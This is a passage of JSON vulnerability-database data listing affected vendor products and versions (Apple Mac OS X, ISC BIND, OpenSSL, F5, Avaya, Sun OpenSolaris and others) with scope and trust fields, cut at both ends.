            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.5.4"
          },
          {
            "_id": null,
            "model": "aura sip enablement services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "communication manager server definity server si/cs",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "_id": null,
            "model": "firepass",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "6.0.3"
          },
          {
            "_id": null,
            "model": "bigip application security manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "9.3.1"
          },
          {
            "_id": null,
            "model": "bind b1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.2.7"
          },
          {
            "_id": null,
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.4"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 89",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 39",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.6"
          },
          {
            "_id": null,
            "model": "message networking mn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "project openssl g",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "_id": null,
            "model": "wizpy",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "0"
          },
          {
            "_id": null,
            "model": "open-enterprise-server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "0"
          },
          {
            "_id": null,
            "model": "enterprise linux as",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "3"
          },
          {
            "_id": null,
            "model": "project openssl h",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "_id": null,
            "model": "-release-p8",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "6.3"
          },
          {
            "_id": null,
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "3.2.1"
          },
          {
            "_id": null,
            "model": "bigip global traffic manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "9.4.8"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 90",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 68",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "bind a4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.4"
          },
          {
            "_id": null,
            "model": "project openssl i",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "_id": null,
            "model": "linux ia-64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "grid engine sun linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "5.3"
          },
          {
            "_id": null,
            "model": "big-ip local traffic manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "9.3.1"
          },
          {
            "_id": null,
            "model": "bind 9.5.0a6",
            "scope": null,
            "trust": 0.3,
            "vendor": "isc",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 67",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "networks vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1050"
          },
          {
            "_id": null,
            "model": "linux powerpc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "7.10"
          },
          {
            "_id": null,
            "model": "project openssl b",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "_id": null,
            "model": "networks ssl vpn module",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "10000"
          },
          {
            "_id": null,
            "model": "client",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "2008"
          },
          {
            "_id": null,
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.5.5"
          },
          {
            "_id": null,
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3.4"
          },
          {
            "_id": null,
            "model": "big-ip local traffic manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "9.4"
          },
          {
            "_id": null,
            "model": "p6",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ntp",
            "version": "4.2.4"
          },
          {
            "_id": null,
            "model": "grid engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "5.3x86"
          },
          {
            "_id": null,
            "model": "bind",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.3.5"
          },
          {
            "_id": null,
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4"
          },
          {
            "_id": null,
            "model": "-releng",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "6.3"
          },
          {
            "_id": null,
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3"
          },
          {
            "_id": null,
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.1"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 77",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 61",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "messaging storage server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "1.0"
          },
          {
            "_id": null,
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.5.2"
          },
          {
            "_id": null,
            "model": "big-ip webaccelerator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "9.4"
          },
          {
            "_id": null,
            "model": "circle",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "voodoo",
            "version": "1.1"
          },
          {
            "_id": null,
            "model": "linux mandrake x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandriva",
            "version": "2009.0"
          },
          {
            "_id": null,
            "model": "communication manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "2.0.1"
          },
          {
            "_id": null,
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.6"
          },
          {
            "_id": null,
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.3"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 82",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "bind 9.5.0-p2-w1",
            "scope": null,
            "trust": 0.3,
            "vendor": "isc",
            "version": null
          },
          {
            "_id": null,
            "model": "7.0-stable",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 29",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "communication manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "1.1"
          },
          {
            "_id": null,
            "model": "bind rc2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.2.7"
          },
          {
            "_id": null,
            "model": "siparator",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.7.1"
          },
          {
            "_id": null,
            "model": "project openssl a",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "_id": null,
            "model": "firewalll",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.4"
          },
          {
            "_id": null,
            "model": "-releng",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "6.2"
          },
          {
            "_id": null,
            "model": "opensuse",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "10.3"
          },
          {
            "_id": null,
            "model": "multi network firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "ssl for openvms",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "1.3"
          },
          {
            "_id": null,
            "model": "bind a1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.4"
          },
          {
            "_id": null,
            "model": "7.0-release-p8",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.5.3"
          },
          {
            "_id": null,
            "model": "bigip application security manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "9.4.8"
          },
          {
            "_id": null,
            "model": "bind rc1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.2.7"
          },
          {
            "_id": null,
            "model": "bigip global traffic manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "9.3"
          },
          {
            "_id": null,
            "model": "firepass",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "6.1"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "rpath",
            "version": "1"
          },
          {
            "_id": null,
            "model": "corporate server x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "bind",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.4.1"
          },
          {
            "_id": null,
            "model": "bind",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.3.6"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.2.9.1"
          },
          {
            "_id": null,
            "model": "bind",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.3.4"
          },
          {
            "_id": null,
            "model": "bind 9.4.2-p2",
            "scope": null,
            "trust": 0.3,
            "vendor": "isc",
            "version": null
          },
          {
            "_id": null,
            "model": "circle",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "voodoo",
            "version": "1.1.34"
          },
          {
            "_id": null,
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.5"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "12.2"
          },
          {
            "_id": null,
            "model": "networks switched firewall series",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "5400"
          },
          {
            "_id": null,
            "model": "pfsense",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "bsdperimeter",
            "version": "1.2.2"
          },
          {
            "_id": null,
            "model": "pfsense",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "bsdperimeter",
            "version": "1.2.1"
          },
          {
            "_id": null,
            "model": "networks switched firewall series",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "6600"
          },
          {
            "_id": null,
            "model": "bind 9.4.2-p2-w2",
            "scope": null,
            "trust": 0.3,
            "vendor": "isc",
            "version": null
          },
          {
            "_id": null,
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.6.4"
          },
          {
            "_id": null,
            "model": "email and web security appliance patch",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "mcafee",
            "version": "5.65"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "hp",
            "version": "3.0.1.73"
          },
          {
            "_id": null,
            "model": "communication manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "big-ip local traffic manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "9.4.8"
          },
          {
            "_id": null,
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.6"
          },
          {
            "_id": null,
            "model": "7.1-stable",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "aura application enablement services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "6.2"
          },
          {
            "_id": null,
            "model": "enterprise linux desktop client",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "5"
          },
          {
            "_id": null,
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.11"
          },
          {
            "_id": null,
            "model": "networks cs",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1000"
          },
          {
            "_id": null,
            "model": "big-ip webaccelerator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "9.4.8"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 105",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.8"
          },
          {
            "_id": null,
            "model": "-pre-release",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "7.1"
          },
          {
            "_id": null,
            "model": "linux lts i386",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "6.06"
          },
          {
            "_id": null,
            "model": "linux enterprise sdk sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "10"
          },
          {
            "_id": null,
            "model": "messaging storage server",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "_id": null,
            "model": "bigip sam",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 88",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "linux amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "opensuse",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "11.4"
          },
          {
            "_id": null,
            "model": "linux mandrake",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandriva",
            "version": "2008.0"
          },
          {
            "_id": null,
            "model": "sparc t3-1b",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "0"
          },
          {
            "_id": null,
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3.3"
          },
          {
            "_id": null,
            "model": "project openssl j",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.8"
          },
          {
            "_id": null,
            "model": "bind",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.3.3"
          },
          {
            "_id": null,
            "model": "bind",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.2.2"
          },
          {
            "_id": null,
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.2.3"
          },
          {
            "_id": null,
            "model": "project openssl h",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "_id": null,
            "model": "proactive contact",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "0"
          },
          {
            "_id": null,
            "model": "linux lts sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "8.04"
          },
          {
            "_id": null,
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4"
          },
          {
            "_id": null,
            "model": "sparc enterprise m5000",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "linux lts i386",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "8.04"
          },
          {
            "_id": null,
            "model": "project openssl a",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.5"
          },
          {
            "_id": null,
            "model": "aura application enablement services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "4.2"
          },
          {
            "_id": null,
            "model": "project openssl i",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "_id": null,
            "model": "firewall",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.7.1"
          },
          {
            "_id": null,
            "model": "project openssl d",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 59",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "linux mips",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "8.1"
          },
          {
            "_id": null,
            "model": "fuji",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "0"
          },
          {
            "_id": null,
            "model": "communication manager server s8300",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "_id": null,
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.6.1"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "12.1"
          },
          {
            "_id": null,
            "model": "big-ip link controller",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "9.4.8"
          },
          {
            "_id": null,
            "model": "corporate server x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "bind",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.1.2"
          },
          {
            "_id": null,
            "model": "radio relay league tqsllib",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "american",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "bind 9.5.0a3",
            "scope": null,
            "trust": 0.3,
            "vendor": "isc",
            "version": null
          },
          {
            "_id": null,
            "model": "linux amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "7.10"
          },
          {
            "_id": null,
            "model": "sparc t3-2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "0"
          },
          {
            "_id": null,
            "model": "corporate server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "bind",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.0.1"
          },
          {
            "_id": null,
            "model": "aura application enablement services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "4.1"
          },
          {
            "_id": null,
            "model": "project openssl 0.9.8g",
            "scope": null,
            "trust": 0.3,
            "vendor": "openssl",
            "version": null
          },
          {
            "_id": null,
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.1.3"
          },
          {
            "_id": null,
            "model": "meeting exchange",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "enterprise manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "1.6"
          },
          {
            "_id": null,
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.5.3"
          },
          {
            "_id": null,
            "model": "solaris 10 sparc",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 96",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "communication manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "linux i386",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "7.10"
          },
          {
            "_id": null,
            "model": "appliance platform linux service",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "rpath",
            "version": "1"
          },
          {
            "_id": null,
            "model": "netra sparc t3-1b",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "0"
          },
          {
            "_id": null,
            "model": "aura application enablement services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.5"
          },
          {
            "_id": null,
            "model": "project openssl a",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "_id": null,
            "model": "networks self-service mps",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "5000"
          },
          {
            "_id": null,
            "model": "linux enterprise server sp3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "10"
          },
          {
            "_id": null,
            "model": "bind",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.1.1"
          },
          {
            "_id": null,
            "model": "project openssl c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "_id": null,
            "model": "bind 9.5.0b2",
            "scope": null,
            "trust": 0.3,
            "vendor": "isc",
            "version": null
          },
          {
            "_id": null,
            "model": "communication manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "communication manager server s8700",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "_id": null,
            "model": "gale",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "gale",
            "version": "0.99"
          },
          {
            "_id": null,
            "model": "project openssl f",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "_id": null,
            "model": "aura application enablement services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 36",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.6"
          },
          {
            "_id": null,
            "model": "bind",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.1"
          },
          {
            "_id": null,
            "model": "messaging storage server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "linux enterprise server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "9"
          },
          {
            "_id": null,
            "model": "esx server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "3.0.3"
          },
          {
            "_id": null,
            "model": "hp-ux b.11.11",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "_id": null,
            "model": "-release-p1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "7.1"
          },
          {
            "_id": null,
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.8"
          },
          {
            "_id": null,
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3.4"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 94",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "aura application enablement services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1.3"
          },
          {
            "_id": null,
            "model": "bind a2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.4"
          },
          {
            "_id": null,
            "model": "novell linux desktop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "9.0"
          },
          {
            "_id": null,
            "model": "linux sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "7.10"
          },
          {
            "_id": null,
            "model": "project openssl",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.3"
          },
          {
            "_id": null,
            "model": "firepass",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "5.5"
          },
          {
            "_id": null,
            "model": "linux mandrake",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandriva",
            "version": "2008.1"
          },
          {
            "_id": null,
            "model": "esx server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.8"
          },
          {
            "_id": null,
            "model": "enterprise linux ws",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4"
          },
          {
            "_id": null,
            "model": "bind",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.3.1"
          },
          {
            "_id": null,
            "model": "enterprise manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "1.4"
          },
          {
            "_id": null,
            "model": "big-ip link controller",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "9.3"
          },
          {
            "_id": null,
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.6"
          },
          {
            "_id": null,
            "model": "-release-p6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "6.3"
          },
          {
            "_id": null,
            "model": "bind 9.4.3-p1",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "isc",
            "version": null
          },
          {
            "_id": null,
            "model": "project openssl c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.1"
          },
          {
            "_id": null,
            "model": "project openssl l",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "_id": null,
            "model": "wanjet",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "5.0.2"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 50",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "proactive contact",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.2.8"
          },
          {
            "_id": null,
            "model": "bind",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.4"
          },
          {
            "_id": null,
            "model": "networks vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "2700"
          },
          {
            "_id": null,
            "model": "networks vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1740"
          },
          {
            "_id": null,
            "model": "corporate server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "networks vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1010"
          },
          {
            "_id": null,
            "model": "aura application enablement services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1.6"
          },
          {
            "_id": null,
            "model": "aura application enablement services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1.4"
          },
          {
            "_id": null,
            "model": "project openssl h",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.8"
          },
          {
            "_id": null,
            "model": "communication manager server s8500",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "_id": null,
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "10.0.0x64"
          },
          {
            "_id": null,
            "model": "bind a3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.4"
          },
          {
            "_id": null,
            "model": "bind 9.5.1b1",
            "scope": null,
            "trust": 0.3,
            "vendor": "isc",
            "version": null
          },
          {
            "_id": null,
            "model": "aura application enablement services",
            "scope": "eq",
            "trust": 0.3,
